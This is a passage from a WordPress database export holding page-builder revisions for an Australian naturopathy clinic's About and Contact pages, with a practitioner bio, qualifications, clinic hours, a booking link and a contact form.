foodie and degree-qualified naturopath. She resides amongst the trees in the Perth Hills. </span></p>\n<p><span style=\"font-family: Montserrat;\">She has always held a passion for holistic health and wellbeing since a young age. Chronic hormonal imbalances and gut issues led her to her first naturopathy appointment where she gained a newfound respect for the profession after achieving success in returning to health. </span></p>\n<p><span style=\"font-family: Montserrat;\">Mel is passionate about educating and empowering clients to achieve their health goals, working to restore balance between their mental, physical and emotional health. She has witnessed firsthand the healing power of herbs and nutrients, incorporating them into her own life as well as her client’s. </span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2023/11/Screenshot_20231123_121727_Instagram.jpg\" title_text=\"Screenshot_20231123_121727_Instagram\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#CCD4C8\" custom_padding=\"|20px||20px|false|false\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2023/11/Screenshot_20231123_121916_Instagram.jpg\" title_text=\"Screenshot_20231123_121916_Instagram\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"RGBA(0,0,0,0)\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||-5px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\"]<p><span style=\"font-family: Montserrat;\">Mel has a keen interest in women’s health, gut health, metabolic dysfunction, autoimmunity and mental health. She keeps up to date with the latest research and findings on all things naturopathy, blending traditional knowledge with evidence-based medicine to achieve positive health outcomes. When she’s not consulting with clients, you’ll most likely find her brewing a cuppa, chasing after her three children or off bushwalking.</span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-size: large;\"><strong><span style=\"font-family: \'Playfair Display\';\">Certifications: </span></strong></span></p>\n<p><span style=\"font-family: Montserrat;\">Bachelor of Health Science (Naturopathy) </span></p>\n<p><span style=\"font-family: Montserrat;\">Bachelor of Science (Biological Science) </span></p>\n<p><span style=\"font-family: Montserrat;\"><span>Accredited G.E.M.M. Practitioner - Gut Ecology and Metabolic Modulation</span></span></p>\n<p><span style=\"font-family: Montserrat;\"><span></span></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; font-weight: normal; font-size: large;\"><strong>Professional memberships</strong>: </span></p>\n<p><span style=\"font-family: Montserrat;\">Australian Natural Therapist’s Association (ANTA)</span></p>\n<ul></ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" overflow-x=\"hidden\" overflow-y=\"hidden\" hover_enabled=\"0\" locked=\"off\" title_text=\"Untitled design\" background_image=\"https://verdenaturopathy.com.au/wp-content/uploads/2025/04/Untitled-design.png\" background_enable_image=\"on\" parallax=\"on\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#000000\" border_style_all=\"none\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#c7d3c0\" button_border_width=\"2px\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 10am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','About','','inherit','closed','closed','','27-revision-v1','','','2025-04-09 21:16:34','2025-04-09 13:16:34','',27,'https://verdenaturopathy.com.au/?p=465',0,'revision','',0),(454,1,'2025-04-09 20:43:01','2025-04-09 12:43:01','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Meet Mel.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Mel is a mother, tea lover, avid foodie and degree-qualified naturopath. She resides amongst the trees in the Perth Hills. </span></p>\n<p><span style=\"font-family: Montserrat;\">She has always held a passion for holistic health and wellbeing since a young age. Chronic hormonal imbalances and gut issues led her to her first naturopathy appointment where she gained a newfound respect for the profession after achieving success in returning to health. </span></p>\n<p><span style=\"font-family: Montserrat;\">Mel is passionate about educating and empowering clients to achieve their health goals, working to restore balance between their mental, physical and emotional health. She has witnessed firsthand the healing power of herbs and nutrients, incorporating them into her own life as well as her client’s. </span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2023/11/Screenshot_20231123_121727_Instagram.jpg\" title_text=\"Screenshot_20231123_121727_Instagram\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" make_equal=\"on\" _builder_version=\"4.9.4\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#CCD4C8\" custom_padding=\"|20px||20px|false|false\" hover_enabled=\"0\" box_shadow_style=\"preset2\" sticky_enabled=\"0\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2023/11/Screenshot_20231123_121916_Instagram.jpg\" title_text=\"Screenshot_20231123_121916_Instagram\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"RGBA(0,0,0,0)\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||-5px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\"]<p><span style=\"font-family: Montserrat;\">Mel has a keen interest in women’s health, gut health, metabolic dysfunction, autoimmunity and mental health. She keeps up to date with the latest research and findings on all things naturopathy, blending traditional knowledge with evidence-based medicine to achieve positive health outcomes. When she’s not consulting with clients, you’ll most likely find her brewing a cuppa, chasing after her three children or off bushwalking.</span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-size: large;\"><strong><span style=\"font-family: \'Playfair Display\';\">Certifications: </span></strong></span></p>\n<p><span style=\"font-family: Montserrat;\">Bachelor of Health Science (Naturopathy) </span></p>\n<p><span style=\"font-family: Montserrat;\">Bachelor of Science (Biological Science) </span></p>\n<p><span style=\"font-family: Montserrat;\"><span>Accredited G.E.M.M. Practitioner - Gut Ecology and Metabolic Modulation</span></span></p>\n<p><span style=\"font-family: Montserrat;\"><span></span></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; font-weight: normal; font-size: large;\"><strong>Professional memberships</strong>: </span></p>\n<p><span style=\"font-family: Montserrat;\">Australian Natural Therapist’s Association (ANTA)</span></p>\n<ul></ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#000000\" border_style_all=\"none\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#c7d3c0\" button_border_width=\"2px\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 10am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','About','','inherit','closed','closed','','27-revision-v1','','','2025-04-09 20:43:01','2025-04-09 12:43:01','',27,'https://verdenaturopathy.com.au/?p=454',0,'revision','',0),(469,1,'2025-04-09 21:23:44','2025-04-09 13:23:44','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" min_height=\"0px\" custom_margin=\"||1px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"1090px\" module_alignment=\"center\" min_height=\"209.5px\" custom_padding=\"||38px|||\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1 style=\"text-align: left;\"><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch.</span></h1>\n<p><span style=\"color: #000000; font-family: \'Playfair Display\';\"></span></p>\n<h4 style=\"text-align: left;\"><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Email us at <a href=\"mailto:hello@verde\">hello@verde</a>naturopathy.com.au or feel free to use the contact form below.</span></span></h4>\n<p><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></p>\n<p><span style=\"color: #000000; font-family: \'Playfair Display\';\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" width=\"80.2%\" min_height=\"550px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px|0px|||false|false\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_contact_form captcha=\"off\" email=\"hello@verdenaturopathy.com.au\" custom_message=\"Name: %%name%%||et_pb_line_break_holder||Email: %%email%%||et_pb_line_break_holder||Message: %%message%%\" success_message=\"Thanks for contacting us. We will be in touch soon.\" submit_button_text=\"Submit\" _builder_version=\"4.9.4\" form_field_background_color=\"#FFFFFF\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" form_field_font=\"Montserrat||||||||\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\" form_field_background_color__hover_enabled=\"on|desktop\"][et_pb_contact_field field_id=\"name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" width=\"95.7%\" custom_margin=\"||17px|-30px||\" custom_padding=\"0px|||0px||\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"color: #000000; font-family: \'Playfair Display\'; font-size: x-large;\">Clinic hours</span></h3>\n<h3></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Tues/Wed: 9:30am-5:30pm<br /></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Thurs: 10am-7pm</span><br /><span style=\"font-family: Montserrat; color: #666666;\">Sat: 9:30am-1pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Online consults available. Please get in touch if the above days/times are unsuitable.</span></span></h3>\n<p><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\">Clinic location</span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking). </span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_image=\"https://verdenaturopathy.com.au/wp-content/uploads/2025/04/Untitled-design.png\" background_enable_image=\"on\" parallax=\"on\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: 